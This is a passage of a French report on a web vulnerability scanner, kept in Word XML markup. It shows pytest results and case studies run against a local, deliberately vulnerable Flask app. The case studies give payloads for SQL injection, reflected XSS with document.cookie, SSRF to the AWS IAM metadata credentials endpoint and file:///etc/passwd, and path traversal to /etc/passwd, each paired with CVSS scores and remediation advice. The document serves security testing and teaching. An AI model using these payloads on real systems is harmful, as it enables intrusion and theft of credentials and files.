        <w:t>tests/test_cvss.py::test_ssrf_score_is_8_5                      PASSED</w:t>
        <w:br/>
        <w:t>tests/test_cvss.py::test_severity_critique_threshold            PASSED</w:t>
        <w:br/>
        <w:t>tests/test_cvss.py::test_severity_eleve_threshold               PASSED</w:t>
        <w:br/>
        <w:lastRenderedPageBreak/>
        <w:t>tests/test_cvss.py::test_severity_moyen_threshold               PASSED</w:t>
        <w:br/>
        <w:t>tests/test_cvss.py::test_unknown_vuln_default_score             PASSED</w:t>
        <w:br/>
        <w:t>tests/test_crawler.py::test_bfs_visits_all_pages                PASSED</w:t>
        <w:br/>
        <w:t>tests/test_crawler.py::test_bfs_depth_limit_respected           PASSED</w:t>
        <w:br/>
        <w:t>tests/test_crawler.py::test_form_post_extracted                 PASSED</w:t>
        <w:br/>
        <w:t>tests/test_crawler.py::test_form_get_extracted                  PASSED</w:t>
        <w:br/>
        <w:t>tests/test_crawler.py::test_file_upload_field_detected          PASSED</w:t>
        <w:br/>
        <w:t>tests/test_crawler.py::test_external_links_excluded             PASSED</w:t>
        <w:br/>
        <w:t>tests/test_crawler.py::test_logout_link_skipped                 PASSED</w:t>
        <w:br/>
        <w:t>tests/test_reporter.py::test_html_contains_vuln_name            PASSED</w:t>
        <w:br/>
        <w:t>tests/test_reporter.py::test_html_contains_cvss_score           PASSED</w:t>
        <w:br/>
        <w:t>tests/test_reporter.py::test_html_contains_recommendation       PASSED</w:t>
        <w:br/>
        <w:t>tests/test_reporter.py::test_html_dashboard_counts              PASSED</w:t>
        <w:br/>
        <w:t>tests/test_file_upload.py::test_php_shell_upload_detected       PASSED</w:t>
        <w:br/>
        <w:t>tests/test_file_upload.py::test_accessible_after_upload         PASSED</w:t>
        <w:br/>
        <w:t>tests/test_file_upload.py::test_safe_extensions_not_flagged     PASSED</w:t>
        <w:br/>
        <w:t>tests/test_passive_detectors.py::test_http_password_form        PASSED</w:t>
        <w:br/>
        <w:t>tests/test_passive_detectors.py::test_missing_hsts_header       PASSED</w:t>
        <w:br/>
        <w:t>tests/test_passive_detectors.py::test_missing_csp_header        PASSED</w:t>
        <w:br/>
        <w:t>tests/test_passive_detectors.py::test_server_version_disclosed  PASSED</w:t>
        <w:br/>
        <w:t>tests/test_passive_detectors.py::test_sri_missing_on_cdn        PASSED</w:t>
        <w:br/>
        <w:t>tests/test_passive_detectors.py::test_default_credentials       PASSED</w:t>
        <w:br/>
        <w:t>tests/test_passive_detectors.py::test_directory_listing         PASSED</w:t>
        <w:br/>
        <w:t>tests/test_passive_detectors.py::test_sensitive_file_exposed    PASSED</w:t>
        <w:br/>
        <w:t>...</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>========================= 26 passed in 1.43s ===========================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304DB982" w14:textId="77777777" w:rsidR="00152CFC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="357FB575" wp14:editId="7F611EEB">
            <wp:extent cx="5029200" cy="30332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jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5029200" cy="3033236"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D26A86" w14:textId="77777777" w:rsidR="00152CFC" w:rsidRPr="003325EF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Figure 2 — Résultats de la suite pytest : 26 tests passés en 1.43s + configuration réseau (ip a)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134D564C"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3.5  Scénarios de Test — Études de Cas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F45D41" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Les huit études de cas suivantes ont été réalisées sur l'application Flask de test locale (http://127.0.0.1:5001), lancée via run_vuln_app.py. Chaque étude présente la cible, le mécanisme </w:t>
        <w:lastRenderedPageBreak/>
        <w:t>de détection, le payload utilisé, la preuve collectée, le score CVSS attribué et la recommandation de remédiation générée.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AA5091" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>3.5.1  Étude de Cas 1 : Injection SQL (OWASP A03) — CVSS 9.8 CRITIQUE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE1AF3B"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http://127.0.0.1:5001/search?q=...   |   Méthode : GET   |   Paramètre : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460C3B48" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Le paramètre q est concaténé directement dans la requête SQL : SELECT * FROM users WHERE name='&lt;input&gt;'. L'absence totale de validation permet l'injection de n'importe quelle syntaxe SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4B129E" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Déroulement de la détection (3 phases) :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011632F6" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="283"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="003366"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 1 — Error-based : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Le scanner envoie le payload simple '. La réponse contient 'You have an error in your SQL syntax' : vulnérabilité confirmée par erreur directe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BADA8A3" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="283"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="003366"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 2 — Time-based : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Si aucune erreur n'était visible, le scanner tenterait ' AND SLEEP(5)-- et mesurerait le délai de réponse (seuil : 4,5s).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602B4191" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="283"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="003366"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 3 — Booléenne : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Dernier recours : comparaison des longueurs de réponse entre ' OR '1'='1 (condition vraie) et ' AND '1'='2 (condition fausse).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767F407F" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Code : Résultat — SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADA4CC3"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injecté  : '</w:t>
        <w:br/>
        <w:t>Réponse serveur  : HTTP 500 — "Error: near "'": syntax error (SQLite)"</w:t>
        <w:br/>
        <w:t>URL complète     : http://127.0.0.1:5001/search?q='</w:t>
        <w:br/>
        <w:t>Score CVSS       : 9.8 — Critique</w:t>
        <w:br/>
        <w:t>Vecteur          : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</w:t>
        <w:br/>
        <w:t>Impact           : Accès complet à la base de données (lecture, modification, suppression)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BF9BCB" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="008C3C"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Remédiation : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Remplacer la concaténation SQL par des prepared statements : cursor.execute('SELECT * FROM users WHERE name=?', (q,)) en SQLite, cursor.execute('SELECT * FROM users WHERE name=%s', (q,)) en MySQL/PostgreSQL. Appliquer le principe du moindre privilège sur le compte de base de données.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C8BB7A" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>3.5.2  Étude de Cas 2 : XSS Réfléchi (OWASP A03) — CVSS 6.1 MOYEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CCED31"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http://127.0.0.1:5001/greet?name=...   |   Paramètre : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB461A5" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>L'endpoint /greet retourne le paramètre name directement dans le HTML sans encodage : return f'&lt;h1&gt;Hello {name}&lt;/h1&gt;'. Tout contenu HTML fourni par l'utilisateur est reflété tel quel dans la réponse.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1212BF8D" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Code : Résultat — XSS Réfléchi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744B3812"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 &lt;script&gt;alert(document.cookie)&lt;/script&gt;</w:t>
        <w:br/>
        <w:t>Réponse serveur  : &lt;h1&gt;Hello &lt;script&gt;alert(document.cookie)&lt;/script&gt;&lt;/h1&gt;</w:t>
        <w:br/>
        <w:t>Preuve           : Payload '&lt;script&gt;' retrouvé littéralement dans la réponse HTTP</w:t>
        <w:br/>
        <w:t>URL              : http://127.0.0.1:5001/greet?name=&lt;script&gt;alert(document.cookie)&lt;/script&gt;</w:t>
        <w:br/>
        <w:t>Score CVSS       : 6.1 — Moyen</w:t>
        <w:br/>
        <w:t>Vecteur          : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N</w:t>
        <w:br/>
        <w:t>Impact           : Vol de cookies de session, redirection malveillante, phishing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B2FF0E" w14:textId="77777777" w:rsidR="00152CFC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BEC2045" wp14:editId="3C9EDD7E">
            <wp:extent cx="5029200" cy="27534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9.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5029200" cy="2753487"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EF80F1" w14:textId="77777777" w:rsidR="00152CFC" w:rsidRPr="003325EF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Figure 9 — Vulnérabilité XSS Réfléchi (A03) détectée : payload &lt;script&gt;alert(XSS)&lt;/script&gt;, CVSS 6.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C329AFB" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="008C3C"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Remédiation : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Utiliser html.escape() en Python (return f'&lt;h1&gt;Hello {html.escape(name)}&lt;/h1&gt;'), implémenter une Content-Security-Policy (CSP) stricte, utiliser un framework qui échappe automatiquement (Jinja2 avec autoescape=True).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C706B91" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>3.5.3  Étude de Cas 3 : SSRF (OWASP A10) — CVSS 8.5 ÉLEVÉ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDB9873"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http://127.0.0.1:5001/fetch?url=...   |   Paramètre : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267480DF" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Le serveur effectue requests.get(url) sans aucune validation de la destination. L'attaquant peut forcer le serveur à contacter des services internes inaccessibles depuis l'extérieur, ou des endpoints de métadonnées cloud.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E809FAF" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Code : Résultat — SSRF (deux payloads)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077AF104"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1        : http://127.0.0.1</w:t>
        <w:br/>
        <w:t>Preuve           : Contenu interne retourné — 'ami-id' détecté dans la réponse</w:t>
        <w:br/>
        <w:t>Payload 2        : http://169.254.169.254/latest/meta-data/iam/security-credentials/</w:t>
        <w:br/>
        <w:t>Preuve           : 'security-credentials' détecté dans la réponse</w:t>
        <w:br/>
        <w:t>URL              : http://127.0.0.1:5001/fetch?url=http://127.0.0.1</w:t>
        <w:br/>
        <w:t>Score CVSS       : 8.5 — Élevé</w:t>
        <w:br/>
        <w:t>Vecteur          : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N</w:t>
        <w:br/>
        <w:t>Impact           : Accès aux metadata AWS/GCP (credentials IAM), services internes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127CE446" w14:textId="77777777" w:rsidR="00152CFC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35A4103A" wp14:editId="720F58A9">
            <wp:extent cx="5029200" cy="2775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jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5029200" cy="2775490"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4DFF49" w14:textId="77777777" w:rsidR="00152CFC" w:rsidRPr="003325EF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Figure 8 — Vulnérabilité SSRF (A10) détectée : payload file:///etc/passwd, preuve root:x:0:0, CVSS 8.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374773A7" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="008C3C"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Remédiation : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Implémenter une allowlist stricte des domaines autorisés, bloquer 127.0.0.1, 0.0.0.0, ::1, et les plages RFC 1918 (10.x, 172.16-31.x, 192.168.x), ainsi que 169.254.169.254 (AWS) et metadata.google.internal (GCP).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2CA93B" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>3.5.4  Étude de Cas 4 : Path Traversal (OWASP A01) — CVSS 7.5 ÉLEVÉ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6514ED"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http://127.0.0.1:5001/file?page=...   |   Paramètre : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE08F6E" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>L'endpoint /file ouvre directement le fichier dont le chemin est fourni par l'utilisateur sans aucune validation ou restriction. L'attaquant peut remonter l'arborescence pour accéder à tout fichier lisible par le processus web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EB45CE" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Code : Résultat — Path Traversal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E1B751"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 ../../etc/passwd</w:t>
        <w:br/>
        <w:t>Preuve           : Contenu /etc/passwd retourné : 'root:x:0:0:root:/root:/bin/bash...'</w:t>
        <w:br/>
        <w:t>URL              : http://127.0.0.1:5001/file?page=../../etc/passwd</w:t>
        <w:br/>
        <w:t>Score CVSS       : 7.5 — Élevé</w:t>
        <w:br/>
        <w:t>Vecteur          : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N</w:t>
        <w:br/>
        <w:t>Impact           : Lecture de fichiers système (/etc/shadow, clés SSH, configs app)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E428335" w14:textId="77777777" w:rsidR="00152CFC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51C93232" wp14:editId="2E978A19">
            <wp:extent cx="5029200" cy="25931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jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5029200" cy="2593181"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B04791" w14:textId="77777777" w:rsidR="00152CFC" w:rsidRPr="003325EF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Figure 7 — Vulnérabilité Path Traversal (A01) détectée : payload ../../../../../../etc/passwd, CVSS 7.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB6722D" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
